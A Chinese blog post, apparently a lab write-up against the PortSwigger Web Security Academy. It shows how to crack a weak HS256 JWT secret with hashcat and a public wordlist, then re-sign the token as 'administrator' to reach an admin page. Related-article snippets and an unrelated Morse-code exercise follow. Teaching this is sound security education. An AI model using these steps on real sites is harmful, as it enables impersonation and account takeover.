6种常见的JWT Attack,绕过网站身份验证 - 3.爆力破解对称式加密签名

最新推荐文章于 2025-06-19 16:13:33 发布
最新推荐文章于 2025-06-19 16:13:33 发布
阅读量989 收藏 5
点赞数 19
CC 4.0 BY-SA版权
文章标签: 网络 安全 web安全 安全威胁分析 系统安全 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/raymond0820/article/details/137455612
本文详细介绍了JWT攻击的原理,包括未验证签名、爆力破解对称加密等手法。通过示例展示了如何利用HS256进行攻击,以及如何通过找到并替换secretkey来防止这类攻击。同时推荐了WebSecurityAcademy的相关资源以获取更多防范措施。

简介

JWT攻击是使用者向网站发送修改后的JWT,目标是冒充另一个身份的使用者,并绕过身份验证和存取控制。 如果攻击者能够使用任意值创建自己的JWT有效令牌,他们能够升级自己的权限或冒充其他用户,完全控制他们的帐户。

JWT常见攻击手法有以下几种:

  1. 签名未验证
  2. JWT无签名
  3. 爆力破解对称式加密签名
  4. 用kid绕过对称式加密签名
  5. 用JWK绕过非对称式加密签名
  6. 用JKU绕过非对称式加密签名


关于JWT的介绍可参考json web token介绍

3.爆力破解对称式加密签名

某些签名算法,像是HS256(HMAC+SHA-256),可以使用任意字符串做为密钥,因此可以透过爆力密码破解得到密钥,并使用密钥重签名

举例如下,以下是访问网站的JWT token,需要administrator身份才能访问,而且使用HS256签名

################ request ################
GET /admin HTTP/1.1
Host: 0aff00980379e949c0ec224a00f90071.web-security-academy.net
Cookie: session=eyJraWQiOiJkYjFiZWEzOS05MjQwLTRjYjItODQ0MS04NjZjMjIxZDFmODUiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY1NzYwNjgwNH0.faMYDNGlalEN2C5YD2NGaRejmOAIXj1GQ2priBVj3yE
...omit...

################ response ################ 
...omit...Admin interface only available if logged in as an administrator...omit...

所以直接改成adminstrator没有用,还必须要得到签名用的secret key,在重新根据修改内容重新签名才行,步骤如下

step1,找出secret key

先准备一组密码档jwt.secrets.list,内容可以参考https://github.com/wallarm/jwt-secrets/blob/master/jwt.secrets.list

然后透过hastcat尝试爆力破解目前token

hashcat -a 0 -m 16500 eyJraWQiOiJkYjFiZWEzOS05MjQwLTRjYjItODQ0MS04NjZjMjIxZDFmODUiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY1NzYwNjgwNH0.faMYDNGlalEN2C5YD2NGaRejmOAIXj1GQ2priBVj3yE jwt.secrets.list

破解后会发现secret key为secret1

step2,产生JWT key

JWT editor keys中选择new symmetric key, 按下generate会产生以下内容

<span style="color:#292b2c"><span style="background-color:#e9e9e9"><code>{
    "kty": "oct",
    "kid": "6e45657d-202e-4e74-a50d-0c8f785dc1cf",
    "k": "qzlgHvHrjWoqNS_9Jd_1EQ"
}</code></span></span>

将刚刚的secret key使用base64编码得到c2VjcmV0MQ==,然后贴上如下

<span style="color:#292b2c"><span style="background-color:#e9e9e9"><code>{
    "kty": "oct",
    "kid": "6e45657d-202e-4e74-a50d-0c8f785dc1cf",
    "k": "c2VjcmV0MQ=="
}</code></span></span>

step3. 对修改的内容重签名

JWT editor将原本的token内容改为administrator如下

<span style="color:#292b2c"><span style="background-color:#e9e9e9"><code>{
    "iss": "portswigger",
    "sub": "administrator", 
    "exp": 1657606804
}</code></span></span>

接着在JWT editor中点选sign,然后选择以下配置

  • signing key: you generated in the JWT editor keys
  • signing algorithm: HS256
  • header options: don't modify header

就会根据token修改的内容,产生相对应的签名,使用这全新token就可以用administrator身份访问admin功能

 其他方法可参考

6种常见的JWT attack方法

Web Security Academy

 

网络攻防中黑客掌握的JWT token破解绕过技术手段,详细实践案例,附技术工具和解密工具
代码讲故事
03-27 1150
网络攻防中黑客掌握的JWT token破解绕过技术手段,详细实践案例,附技术工具和解密工具。JSON Web Tokens(JWT)是一种开放标准(RFC 7519),用于在双方之间安全地传输信息作为JSON对象。JWT网络应用中广泛用于身份验证和信息交换。尽管JWT设计中包含了安全性考虑,但在实际应用中可能存在不当使用或配置错误,导致JWT破解绕过
RSA-OAEP 填充漏洞复现与 ElGamal 离散对数攻击实战
qq_42568323的博客
04-15 50
在现代信息安全体系中,非对称密码技术发挥着至关重要的作用。与对称加密在密钥共享上存在的困难不同,非对称加密利用一对密钥(公钥和私钥)解决了这一问题,在数字签名、密钥交换以及数据加密等方面具有广泛应用。本文将聚焦于两大具有代表性的非对称算法:RSA 和 ElGamal,并通过两个具体实例展开讨论:本文旨在为密码学和信息安全的研究人员、工程师和爱好者提供一个理论与实战相结合的完整闭环:在“破盾”中剖析非对称密码中的设计缺陷,在“铸盾”中通过正确实现的加密系统提升防御意识。同时,通过图形化交互界面,使得整个实验过
JWT介绍&amp;空加密&amp;暴破密钥&amp;私钥泄露&amp;密钥混淆&amp;黑盒_jwt泄露
2301_82243558的博客
04-09 1360
这里考虑两种思路:1、破密钥,显然难度较大;2、尝试将加密算法置空,也就是 alg=none同样,将 JWT 值发到 Decoder 模块,先 Base64 解码,将 HS256 替换为 none,user 替换为 admin 后,再 Base64 编码。但需要注意的是,使用此方法要先将 Signature 部分删除掉,因为加密算法为 none 必须将签名置空,并且需要将 Header 和 Claims 分别处理后再用 . 号连接,因为实测直接一起处理是不行的。最终的格为:Header.Claims.
BurpSuite 秘籍第二版(三)
最新发布
龙哥盟
06-19 1102
原文:annas-archive.org/md5/ac8636ca42d7bb48c9364852fd6f1216
(渗透学习)JWT绕过
yang1234567898的博客
12-30 5749
1、什么是JWT 参考文章:https://www.jianshu.com/p/576dbf44b2ae 2、JWT验证绕过 https://jwt.io/
破解JWT令牌
cullen2012的博客
09-11 2985
For Educational Purposes Only! Intended for 仅用于教育目的! 旨在用于Hackers Penetration testers.黑客渗透测试人员。 问题 (Issue) The algorithm HS256 uses the secret key to sign and verify each message. The algorithm RS...
JWT 破解
十一.的博客
10-25 1116
一个jwt token由三部分组成,header、payload与signature,以点隔开,形如aaaa.bbbb.cccc。signature,将前两部分用alg指定的算法加密,再经过Base64Url编码就是signature了,作用是防止数据篡改。alg属性表示签名的算法(algorithm),默认是 HMAC SHA256(写成 HS256);typ属性表示这个令牌(token)的类型(type),JWT 令牌统一写为JWT。一般推荐去http://jwt.io/解码。
6常见JWT Attack,绕过网站身份验证 - 1.签名未验证
raymond0820的博客
04-04 675
JWT攻击是使用者向网站发送修改后的JWT,目标是冒充另一个身份的使用者,并绕过身份验证和存取控制。 如果攻击者能够使用任意值创建自己的JWT有效令牌,他们能够升级自己的权限或冒充其他用户,完全控制他们的帐户。
6常见JWT Attack,绕过网站身份验证 - 2.JWT签名
raymond0820的博客
04-06 521
JWT攻击是使用者向网站发送修改后的JWT,目标是冒充另一个身份的使用者,并绕过身份验证和存取控制。 如果攻击者能够使用任意值创建自己的JWT有效令牌,他们能够升级自己的权限或冒充其他用户,完全控制他们的帐户。
Diffie-Hellman密钥交换协议(Diffie-Hellman Key Exchange,简称DHKE)
西京刀客
05-28 2734
Deffie-Hellman(简称 DH) 密钥交换是最早的密钥交换算法之一,它使得通信的双方能在非安全的信道中安全的交换密钥,用于加密后续的通信消息。 Whitfield Diffie 和 Martin Hellman 于 **1976** 提出该算法,之后被应用于安全领域,比如 Https 协议的 TSL(Transport Layer Security)以 DH 算法作为密钥交换算法。
物联网网络中可解释的深度学习入侵检测An explainable deep learning-enabled intrusion detection framework in IoT networks
风口IT猪的成长录
05-27 378
尽管可解释人工智能(XAI)领域近来备受关注,但其在网络安全应用中的实现仍需要进一步研究,以了解其在发现攻击面和向量方面的有效性。在网络防御中,特别是基于异常的入侵检测系统(IDS),。本文提出了一种新颖的可解释的物联网(IoT)网络入侵检测框架。我们开发了一种 IDS,使用短期长记忆 (LSTM) 模型来识别网络攻击并解释模型的决策。
jwt_tool:用于测试,调整和破解JSON Web令牌的工具包
04-29
JSON Web令牌工具包v2 jwt_tool.py是用于验证,伪造,扫描和篡改JWT(JSON Web令牌)的工具包。 其功能包括: 检查令牌的有效性 测试已知漏洞: (CVE-2015-2951) alg = none签名绕过漏洞 (CVE-2016-10555) RS / HS256公钥不匹配漏洞 (CVE-2018-0114)密钥注入漏洞 (CVE-2019-20933 / CVE-2020-28637)空白密码漏洞 (CVE-2020-28042)空签名漏洞 扫描配置错误或已知漏洞 模糊声明值以引发意外行为 测试机密/密钥文件/公共密钥/ JWKS密钥的有效性 通过高速字典攻击识别弱键 伪造新的令牌头和有效载荷内容,并使用密钥或通过其他攻击方法创建新的签名 时间戳篡改 RSA和ECDSA密钥生成和重建(来自JWKS文件) ...还有更多! 观众 该工具是为渗透测试人员
jwt解密
神zhi殇的博客
11-02 6633
文章目录认识JWT什么是JWTJWT的原理HeaderPayloadSignatureJWT解码 认识JWT 什么是JWTJWT全称是JSON Web Token是一个开放标准(RFC 7519),目前最流行的跨域身份验证解决方案。 它定义了一种经过加密的格,放在json对象在请求中传递,用于验证请求是否被允许访问。 JWT的原理 服务器经过认证以后,会生成加密串返回前台,结构如下图: JSON Web Token由三部分组成,它们之间用.连接。 * Header 头部 * Payload
portswigger JWT attacks
weixin_63231007的博客
11-05 2153
通过 jwk header注入绕过身份验证 不同的是,这个 jku header注入多了一个漏洞利用服务器,因而我们可以通过 把 JWK set放到漏洞利用服务器上,然后通过往header里写入 "jku":"漏洞利用服务器url" 从而实现 jwk 注入到header里,有种远程文件包含的味道。Hashcat 使用 wordlist 中的每个密钥对来自 JWT 的标头和有效负载进行签名,然后将生成的签名与来自服务器的原始签名进行比较。JWE 非常相似,只是令牌的实际内容是加密的,而不仅仅是编码的。
jwt的repay attacks
weixin_34117211的博客
08-15 159
REST Security Cheat Sheet Prevention against replay attacks The JWT spec provides the jti field as a way to prevent replay attacks. That being said tokens return by Aut...
【Python】jwt解码
诗与浪子的博客
10-07 1997
【代码】jwt解码。
Hacking JWT(JSON Web Token)
weixin_30950607的博客
08-29 416
目录 0x01 JWT工作流程 0x02 JWT的格 0x03 攻击JWT 1. 敏感信息泄露 2. 修改算法为none 3. 修改算法RS256为HS256(非对称密码算法 => 对称密码算法) 4. HS256对称加密)密钥破解 ...
JWT在线解密/JWT在线解码 - 加菲工具
热门推荐
04-01 1万+
JWT在线解密/JWT在线解码 地址:https://www.orcc.top/tools/jwt
字符 电码符号 字符 电码符号 字符 电码符号 字符 电码符号 A .━ B ━ ... C ━ .━ . D ━ .. E . F ..━ . G ━ ━ . H .... I .. J .━ ━ ━ K ━ .━ L .━ .. M ━ ━ N ━ . O ━ ━ ━ P .━ ━ . Q ━ ━ .━ R .━ . S ... T ━ U ..━ V ...━ W .━ ━ X ━ ..━ Y ━ .━ ━ Z ━ ━ .. ls = [".-","-...","-.-.","-..",".","..-.","--.","....","..",".---","-.-",".-..","--","-.","---",".--.","--.-",".-.","...","-","..-","...-",".--","-..-","-.--","--.."] 编程要求 根据提示,在右侧编辑器补充代码,将英文句子转换成摩尔斯电码。 测试说明 平台会对你编写的代码进行测试测试输入: Attack on Pearl Harbor 预期输出: .---.--.-.-.- ----. .--...-.-..-.. .....-.-.-...---.-. 注意:英文句子里的大写字母先转换为小写字母再译码,不是字母的符号保持原样不变。 text = &#39;Attack on Pearl Harbor&#39; print(text.lower()) # attack on pearl harbor def morse_code_encryption(txt): """接收明文字符串为参数,返回用摩斯密码加密后的字符串。""" # 补充你的代码 if __name__ == &#39;__main__&#39;: plaintext = input().lower() # 输入一个字符串并转为小写 print(morse_code_encryption(plaintext)) # 调用函数,并输出返回值
05-16
### Python 编程实现英文句子到摩尔斯电码的转换 以下是基于用户需求设计的一个 Python 函数,用于将输入的英文句子转换为摩尔斯电码。该函数能够识别并保留非字母字符不变,同时支持大小写自动处理。 ```python def convert_to_morse(sentence): """ 将输入的英文句子转换为摩尔斯电码。 参数: sentence (str): 输入的英文句子 返回: str: 转换后的摩尔斯电码字符串 """ # 定义摩尔斯电码字典 morse_code_dict = { &#39;a&#39;: ".-", &#39;b&#39;: "-...", &#39;c&#39;: "-.-.", &#39;d&#39;: "-..", &#39;e&#39;: ".", &#39;f&#39;: "..-.", &#39;g&#39;: "--.", &#39;h&#39;: "....", &#39;i&#39;: "..", &#39;j&#39;: ".---", &#39;k&#39;: "-.-", &#39;l&#39;: ".-..", &#39;m&#39;: "--", &#39;n&#39;: "-.", &#39;o&#39;: "---", &#39;p&#39;: ".--.", &#39;q&#39;: "--.-", &#39;r&#39;: ".-.", &#39;s&#39;: "...", &#39;t&#39;: "-", &#39;u&#39;: "..-", &#39;v&#39;: "...-", &#39;w&#39;: ".--", &#39;x&#39;: "-..-", &#39;y&#39;: "-.--", &#39;z&#39;: "--.." # 只包含小写字母的映射关系 } # 结果存储列表 result = [] # 遍历输入句子中的每一个字符 for char in sentence: if char.isalpha(): # 如果当前字符是字母 lower_char = char.lower() # 转换为小写 if lower_char in morse_code_dict: # 查找对应摩尔斯电码 result.append(morse_code_dict[lower_char]) # 添加到结果中 else: result.append(char) # 若无匹配项则保持原样 elif char == &#39; &#39;: # 如果为空格,则用斜杠代替作为单词分隔符 result.append(&#39;/&#39;) else: result.append(char) # 非字母字符保持不变 # 使用空格连接所有摩尔斯电码片段并返回 return &#39; &#39;.join(result) # 测试代码 if __name__ == "__main__": test_sentence = "Attack on Pearl Harbor" converted_morse = convert_to_morse(test_sentence) print(converted_morse) ``` #### 功能解释 1. **摩尔斯电码字典定义** 字典 `morse_code_dict` 存储了从英文字母到其对应的摩尔斯电码的映射关系[^1]。 2. **遍历输入字符串** 对于输入字符串中的每个字符,如果它是字母,则将其转换为小写后查找相应的摩尔斯电码;如果是其他字符(如标点符号或数字),则直接添加至结果列表[^2]。 3. **单词间的分隔** 英文句子中的空格被替换为 `/` 符号,以便在输出的摩尔斯电码中区分不同单词[^1]。 4. **最终结果生成** 所有找到的摩尔斯电码片段通过空格连接起来形成最终的结果字符串[^2]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值